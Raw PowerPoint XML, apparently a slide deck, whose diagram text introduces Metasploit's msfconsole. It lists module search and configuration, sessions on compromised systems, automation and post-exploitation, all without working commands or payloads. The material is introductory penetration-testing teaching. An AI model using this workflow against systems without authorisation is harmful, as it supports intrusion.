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2" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId28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8" r:id="rId13"/>
    <p:sldId id="276" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="275" r:id="rId16"/>
    <p:sldId id="269" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="271" r:id="rId19"/>
    <p:sldId id="272" r:id="rId20"/>
    <p:sldId id="273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51"/>
    <p:restoredTop sz="94674"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="824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30AB5E-98E2-4585-803E-50D16823B0C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0FC8B94-6406-43DA-8545-14F64A1109C3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>What is msfconsole?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{55ED4718-92B7-41D5-8612-70F9F189112A}" type="parTrans" cxnId="{FE42DEFD-AE95-4D54-93FA-BCE533E40E74}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF1EFE9A-ACA9-4A62-813A-6B6B660C4D45}" type="sibTrans" cxnId="{FE42DEFD-AE95-4D54-93FA-BCE533E40E74}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BBF0D456-0B68-4167-8FFB-778D95180561}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>msfconsole is the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>main command-line interface</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t> of the Metasploit Framework, a powerful penetration testing tool used by cybersecurity professionals and ethical hackers. It provides a flexible and powerful environment to search, configure, and execute exploits, payloads, auxiliary modules, and more.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D49E934B-6AB8-4D09-9C29-E58DB492A185}" type="parTrans" cxnId="{19D41640-1C4D-49E9-AC15-B75D53447678}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EFEFB360-1B2D-428C-AF42-EA12B0D721C2}" type="sibTrans" cxnId="{19D41640-1C4D-49E9-AC15-B75D53447678}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63BC1EA3-3DAE-43A5-8D30-F781417713F5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Key Features of msfconsole:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{914E4AB3-8655-4EC0-89A1-FE6EF819468E}" type="parTrans" cxnId="{32EE81A9-58F0-4143-9869-CDD501E28D35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B9DB058-2E92-490C-9B98-EE2380921D98}" type="sibTrans" cxnId="{32EE81A9-58F0-4143-9869-CDD501E28D35}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F619C91A-A4CD-4D4F-BC73-47D3862C1B04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🔍 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Module Search</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Quickly find exploits, payloads, post-exploitation tools, and scanners using search.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{439380C8-F211-4D05-BC14-FB919C96605B}" type="parTrans" cxnId="{4FF191AC-F9EB-4CFA-8DE8-0949BE7341A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8638F325-4AF5-4DD0-BE8C-68D9E87CC820}" type="sibTrans" cxnId="{4FF191AC-F9EB-4CFA-8DE8-0949BE7341A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8340262-EF82-43E5-94C6-2DF400EE6A33}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🛠️ </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Module Configuration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Use use &lt;module&gt;, set &lt;option&gt;, and show options to configure attacks.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7D4AAA4-FF45-4A38-BB4A-714EB16B317A}" type="parTrans" cxnId="{636A6AC2-B58D-404C-8DBD-7057C9C5BBED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DBB62151-AE15-4513-9A55-FB51756C149D}" type="sibTrans" cxnId="{636A6AC2-B58D-404C-8DBD-7057C9C5BBED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F5111DF-21A6-4049-94D2-F4A432F7F4A8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🧠 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Database Integration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Integrate with a PostgreSQL database to store data from scans and sessions.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8BA4D85-218D-40F8-A643-7832F43B298B}" type="parTrans" cxnId="{C91F984E-4E98-479B-A413-D19684C43D5E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64F13BE2-C5C9-4CC7-9B6C-D480B13C344F}" type="sibTrans" cxnId="{C91F984E-4E98-479B-A413-D19684C43D5E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A2AF6F2-FC09-4AA1-802E-011DEC5E3254}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🔄 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Session Management</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Interact with compromised systems using sessions command.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{455C87E0-8F98-4942-9B98-1791B4E41FB2}" type="parTrans" cxnId="{71E8CDB3-E79C-4128-9635-A1DD9C65F044}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F78497DE-2462-4D37-A436-C6086E62DE8F}" type="sibTrans" cxnId="{71E8CDB3-E79C-4128-9635-A1DD9C65F044}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08E0F5AC-7E15-461D-9644-C1DDBCCE5043}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🧩 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Automation Support</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Scripts and resource files (.rc) can automate complex workflows.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{168BEF23-7252-4215-BBED-2C6C17AC47EF}" type="parTrans" cxnId="{7DAD5BF5-BC64-4390-B6D6-8F0E7EBE16AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56188926-022A-4067-B1F7-240AD894B82C}" type="sibTrans" cxnId="{7DAD5BF5-BC64-4390-B6D6-8F0E7EBE16AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56985E8E-9D4A-484F-975B-DD63E4C58CA4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>📊 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Info Gathering</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: Run auxiliary modules like scanners or fuzzers to gather information before exploitation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{357AB8E8-642D-4542-8EC1-5E62361DA60F}" type="parTrans" cxnId="{C28C12B7-8444-4641-8BF1-C3C303817CAA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCDBB0DA-9191-4096-A4BB-17CD5FE5B050}" type="sibTrans" cxnId="{C28C12B7-8444-4641-8BF1-C3C303817CAA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{699D8633-3583-4161-8E4D-AB3C909B0B9B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>🔐 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>Post-Exploitation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>: After gaining access, use post modules to gather more data or maintain access.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{43486210-9AF2-4442-93FD-A878C7809F33}" type="parTrans" cxnId="{169A0A0C-3844-4F62-99F1-708CB97F4CF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51FA9D35-BF46-4B99-B13C-5F7172EE6D02}" type="sibTrans" cxnId="{169A0A0C-3844-4F62-99F1-708CB97F4CF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" type="pres">
      <dgm:prSet presAssocID="{B230AB5E-98E2-4585-803E-50D16823B0C6}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{987B758C-B9DD-2F4B-A12D-AE58ADDFADB8}" type="pres">
      <dgm:prSet presAssocID="{60FC8B94-6406-43DA-8545-14F64A1109C3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AA043137-B605-294B-8A2D-5CA20139CADF}" type="pres">
      <dgm:prSet presAssocID="{FF1EFE9A-ACA9-4A62-813A-6B6B660C4D45}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77EF4160-D041-7347-AE67-3FC2F12623D7}" type="pres">
      <dgm:prSet presAssocID="{BBF0D456-0B68-4167-8FFB-778D95180561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5A868245-F14B-5942-A0BE-AF0124103AF6}" type="pres">
      <dgm:prSet presAssocID="{EFEFB360-1B2D-428C-AF42-EA12B0D721C2}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0398D707-2E6E-1D45-9FD4-45F405E586F4}" type="pres">
      <dgm:prSet presAssocID="{63BC1EA3-3DAE-43A5-8D30-F781417713F5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21E27B0D-6E9B-3041-9338-59CD3D96B730}" type="pres">
      <dgm:prSet presAssocID="{9B9DB058-2E92-490C-9B98-EE2380921D98}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{448AD047-D235-0041-BDAA-CCFDBC3B08C6}" type="pres">
      <dgm:prSet presAssocID="{F619C91A-A4CD-4D4F-BC73-47D3862C1B04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02E34676-2C53-A24E-946F-5D727EB8332B}" type="pres">
      <dgm:prSet presAssocID="{8638F325-4AF5-4DD0-BE8C-68D9E87CC820}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1EDF4C54-D71F-F24C-AD2D-8983878CD817}" type="pres">
      <dgm:prSet presAssocID="{F8340262-EF82-43E5-94C6-2DF400EE6A33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EF163A10-3A52-FA4D-8A4A-7B8AD74423BD}" type="pres">
      <dgm:prSet presAssocID="{DBB62151-AE15-4513-9A55-FB51756C149D}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DDBF5CB2-8F5B-E540-820C-5280CF95BC71}" type="pres">
      <dgm:prSet presAssocID="{5F5111DF-21A6-4049-94D2-F4A432F7F4A8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B0384050-5C8F-2442-870D-AC9C2372E49C}" type="pres">
      <dgm:prSet presAssocID="{64F13BE2-C5C9-4CC7-9B6C-D480B13C344F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2710EA5E-C778-574A-BCB9-34036A5F8213}" type="pres">
      <dgm:prSet presAssocID="{8A2AF6F2-FC09-4AA1-802E-011DEC5E3254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92F19EB2-AF97-9F49-A8A3-A4B81ABA7E2E}" type="pres">
      <dgm:prSet presAssocID="{F78497DE-2462-4D37-A436-C6086E62DE8F}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05085D1D-68E8-4140-961D-8B4F4F098364}" type="pres">
      <dgm:prSet presAssocID="{08E0F5AC-7E15-461D-9644-C1DDBCCE5043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EFAC4F41-E2A5-C94C-836F-E2A1CC4D5C21}" type="pres">
      <dgm:prSet presAssocID="{56188926-022A-4067-B1F7-240AD894B82C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A4DBDC3F-0C99-3D4A-9546-DB440B8DD493}" type="pres">
      <dgm:prSet presAssocID="{56985E8E-9D4A-484F-975B-DD63E4C58CA4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F0713DA5-AF3F-AA42-BEB7-A5B1340AC017}" type="pres">
      <dgm:prSet presAssocID="{CCDBB0DA-9191-4096-A4BB-17CD5FE5B050}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C4D77DF7-04FF-D24E-A2A6-7E28BEBEEACE}" type="pres">
      <dgm:prSet presAssocID="{699D8633-3583-4161-8E4D-AB3C909B0B9B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169A0A0C-3844-4F62-99F1-708CB97F4CF9}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{699D8633-3583-4161-8E4D-AB3C909B0B9B}" srcOrd="9" destOrd="0" parTransId="{43486210-9AF2-4442-93FD-A878C7809F33}" sibTransId="{51FA9D35-BF46-4B99-B13C-5F7172EE6D02}"/>
    <dgm:cxn modelId="{66FBC712-C214-674F-B644-C25A61E608AF}" type="presOf" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{19D41640-1C4D-49E9-AC15-B75D53447678}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{BBF0D456-0B68-4167-8FFB-778D95180561}" srcOrd="1" destOrd="0" parTransId="{D49E934B-6AB8-4D09-9C29-E58DB492A185}" sibTransId="{EFEFB360-1B2D-428C-AF42-EA12B0D721C2}"/>
    <dgm:cxn modelId="{E93A2141-9684-7347-9879-E9252FA9B76E}" type="presOf" srcId="{5F5111DF-21A6-4049-94D2-F4A432F7F4A8}" destId="{DDBF5CB2-8F5B-E540-820C-5280CF95BC71}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C91F984E-4E98-479B-A413-D19684C43D5E}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{5F5111DF-21A6-4049-94D2-F4A432F7F4A8}" srcOrd="5" destOrd="0" parTransId="{C8BA4D85-218D-40F8-A643-7832F43B298B}" sibTransId="{64F13BE2-C5C9-4CC7-9B6C-D480B13C344F}"/>
    <dgm:cxn modelId="{80773D56-3EE2-CA41-BF9C-5B871B30A1F2}" type="presOf" srcId="{56985E8E-9D4A-484F-975B-DD63E4C58CA4}" destId="{A4DBDC3F-0C99-3D4A-9546-DB440B8DD493}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{ED91936A-0F64-EC4A-9FA3-CB305CC29CFE}" type="presOf" srcId="{60FC8B94-6406-43DA-8545-14F64A1109C3}" destId="{987B758C-B9DD-2F4B-A12D-AE58ADDFADB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A260ED7E-BFEC-8A4F-B31C-256D4F7881C1}" type="presOf" srcId="{8A2AF6F2-FC09-4AA1-802E-011DEC5E3254}" destId="{2710EA5E-C778-574A-BCB9-34036A5F8213}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{47DD1F98-B042-FD46-A6B5-C792F45C722F}" type="presOf" srcId="{BBF0D456-0B68-4167-8FFB-778D95180561}" destId="{77EF4160-D041-7347-AE67-3FC2F12623D7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{32EE81A9-58F0-4143-9869-CDD501E28D35}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{63BC1EA3-3DAE-43A5-8D30-F781417713F5}" srcOrd="2" destOrd="0" parTransId="{914E4AB3-8655-4EC0-89A1-FE6EF819468E}" sibTransId="{9B9DB058-2E92-490C-9B98-EE2380921D98}"/>
    <dgm:cxn modelId="{C45F8DAA-33D2-5845-9BD1-38CE110BBA14}" type="presOf" srcId="{699D8633-3583-4161-8E4D-AB3C909B0B9B}" destId="{C4D77DF7-04FF-D24E-A2A6-7E28BEBEEACE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{4FF191AC-F9EB-4CFA-8DE8-0949BE7341A8}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{F619C91A-A4CD-4D4F-BC73-47D3862C1B04}" srcOrd="3" destOrd="0" parTransId="{439380C8-F211-4D05-BC14-FB919C96605B}" sibTransId="{8638F325-4AF5-4DD0-BE8C-68D9E87CC820}"/>
    <dgm:cxn modelId="{71E8CDB3-E79C-4128-9635-A1DD9C65F044}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{8A2AF6F2-FC09-4AA1-802E-011DEC5E3254}" srcOrd="6" destOrd="0" parTransId="{455C87E0-8F98-4942-9B98-1791B4E41FB2}" sibTransId="{F78497DE-2462-4D37-A436-C6086E62DE8F}"/>
    <dgm:cxn modelId="{C28C12B7-8444-4641-8BF1-C3C303817CAA}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{56985E8E-9D4A-484F-975B-DD63E4C58CA4}" srcOrd="8" destOrd="0" parTransId="{357AB8E8-642D-4542-8EC1-5E62361DA60F}" sibTransId="{CCDBB0DA-9191-4096-A4BB-17CD5FE5B050}"/>
    <dgm:cxn modelId="{636A6AC2-B58D-404C-8DBD-7057C9C5BBED}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{F8340262-EF82-43E5-94C6-2DF400EE6A33}" srcOrd="4" destOrd="0" parTransId="{E7D4AAA4-FF45-4A38-BB4A-714EB16B317A}" sibTransId="{DBB62151-AE15-4513-9A55-FB51756C149D}"/>
    <dgm:cxn modelId="{6D546FE8-BE20-1A4B-B628-BD3B5565188F}" type="presOf" srcId="{F619C91A-A4CD-4D4F-BC73-47D3862C1B04}" destId="{448AD047-D235-0041-BDAA-CCFDBC3B08C6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5C59A5EF-3F79-9B47-867B-9E2D1DA03FD3}" type="presOf" srcId="{63BC1EA3-3DAE-43A5-8D30-F781417713F5}" destId="{0398D707-2E6E-1D45-9FD4-45F405E586F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2C6EA8F3-64E3-2347-A944-0F89B4258AC6}" type="presOf" srcId="{08E0F5AC-7E15-461D-9644-C1DDBCCE5043}" destId="{05085D1D-68E8-4140-961D-8B4F4F098364}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1BBB84F4-3A79-7845-B6DD-42D05F180FA8}" type="presOf" srcId="{F8340262-EF82-43E5-94C6-2DF400EE6A33}" destId="{1EDF4C54-D71F-F24C-AD2D-8983878CD817}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7DAD5BF5-BC64-4390-B6D6-8F0E7EBE16AD}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{08E0F5AC-7E15-461D-9644-C1DDBCCE5043}" srcOrd="7" destOrd="0" parTransId="{168BEF23-7252-4215-BBED-2C6C17AC47EF}" sibTransId="{56188926-022A-4067-B1F7-240AD894B82C}"/>
    <dgm:cxn modelId="{FE42DEFD-AE95-4D54-93FA-BCE533E40E74}" srcId="{B230AB5E-98E2-4585-803E-50D16823B0C6}" destId="{60FC8B94-6406-43DA-8545-14F64A1109C3}" srcOrd="0" destOrd="0" parTransId="{55ED4718-92B7-41D5-8612-70F9F189112A}" sibTransId="{FF1EFE9A-ACA9-4A62-813A-6B6B660C4D45}"/>
    <dgm:cxn modelId="{189D30A8-2893-FC4D-BE4B-2FD25E8B28FC}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{987B758C-B9DD-2F4B-A12D-AE58ADDFADB8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{13F18A7D-57CD-0149-BF2F-D6D9D528D99A}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{AA043137-B605-294B-8A2D-5CA20139CADF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6B6E9C0A-6BAF-EE42-A4B6-CAB824C0CC36}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{77EF4160-D041-7347-AE67-3FC2F12623D7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8E34E47E-4F32-BA44-95EA-304FE53C59C9}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{5A868245-F14B-5942-A0BE-AF0124103AF6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{34C6E034-F7E3-9641-80C7-62F67FED0935}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{0398D707-2E6E-1D45-9FD4-45F405E586F4}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F7455322-EF4F-224F-AA93-25E8FA97BB89}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{21E27B0D-6E9B-3041-9338-59CD3D96B730}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0CCB1976-25B1-B54B-9A19-5589FEBEE8DB}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{448AD047-D235-0041-BDAA-CCFDBC3B08C6}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{01702888-ECA1-954E-B125-1DE73EA6B346}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{02E34676-2C53-A24E-946F-5D727EB8332B}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{EA47F02A-3F94-F84A-ACAC-8FFBDE35589D}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{1EDF4C54-D71F-F24C-AD2D-8983878CD817}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C1B7A1B2-43A8-264D-9EFF-8E7F5A0C9ABC}" type="presParOf" srcId="{B859BFCF-DF6A-2148-9911-1345A9BB562F}" destId="{EF163A10-3A52-FA4D-8A4A-7B8AD74423BD}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
